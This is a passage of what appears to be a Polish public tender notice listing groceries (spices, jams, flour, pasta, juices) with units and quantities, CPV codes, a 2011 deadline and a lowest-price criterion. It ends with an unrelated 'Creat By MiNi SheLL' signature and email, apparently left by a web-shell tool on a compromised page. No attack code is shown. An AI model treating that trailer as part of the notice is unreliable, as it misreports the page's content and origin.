31.	Papryka mielona słodka ( 20 g torebki )	szt	20
32.	Budyń różne smaki( 65 g torebki )	szt	350
33.	Ketchup( 500 g )	szt	260
34.	Kisiel różne smaki( 58 g torebki )	szt	100
35.	Kminek( 20 g torebki )	szt	50
36.	Pieprz naturalny mielony( 20 g torebki )	szt	200
37.	Proszek do pieczenia( 18 g torebki )	Szt.	10
38.	Cukier waniliowy( 16 g torebki )	Szt.	30
39.	Majeranek( 10 g torebki )	Szt.	10
40.	Gałka muszkatołowa( 10 g torebki )	Szt.	20
41.	Ziele angielskie( 15 g torebki )	Szt.	20
42.	Mleko zagęszczone Słodzone (530g)	Szt.	70
43.	Wafle tortowe(200 g )	Szt.	70
44.	Galaretka owocowa (79 g )	Szt.	500
45.	Rodzynki  (100g )	Szt.	20
46.	Kokos  (100g )	Szt.	40
47.	Drożdże świeże	Kg	2
48.	Sok syrop 0.33l	szt	30
49.	Sok owocowy (0,33l)	szt	1500
50.	Sok owocowy b/c (0.30l) 	szt	220
51.	Konserwa tyrolska mięsna  300 g	Szt.	300
52.	Dżem wiśniowy ( 260 g słoik )	szt	150
53.	Dżem truskawkowy ( 260 g słoik )	szt	150
54.	Dżem czarna porzeczka (260g słoik)	szt	100
55	Marmolada(0,9 l  ( słoik )	Szt.	30
56	Mąka pszenna lux -poznańska 1 kg	Kg	400
57	Mąka ziemniaczana( 0,5 kg )	Kg	10
58	Kasza manna (0,5 kg )	Kg	60
59	Kasza gryczana (0,5 kg )	Kg	30
60	Kasza jęczmienna (0.5kg)	kg	30
61	Makaron  świderki 	kg	350
62	Makaron lubelski nitka (0,5kg)	kg	10
63	Bułka tarta /0.50kg/	Kg	25
64	Groch połówki (0,5 kg )	Kg	20
65	Ryż (1 kg )	Kg	140
66	Miód pszczeli naturalny ( 400g słoik)	szt	100
67	Płatki owsiane 	kg	10
68	Płatki kukurydziane 	kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.33.22.00-6, 15.85.10.00-8, 15.43.00.00-1, 15.89.00.00-3, 15.13.10.00-5, 15.80.00.00-6, 15.33.22.90-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com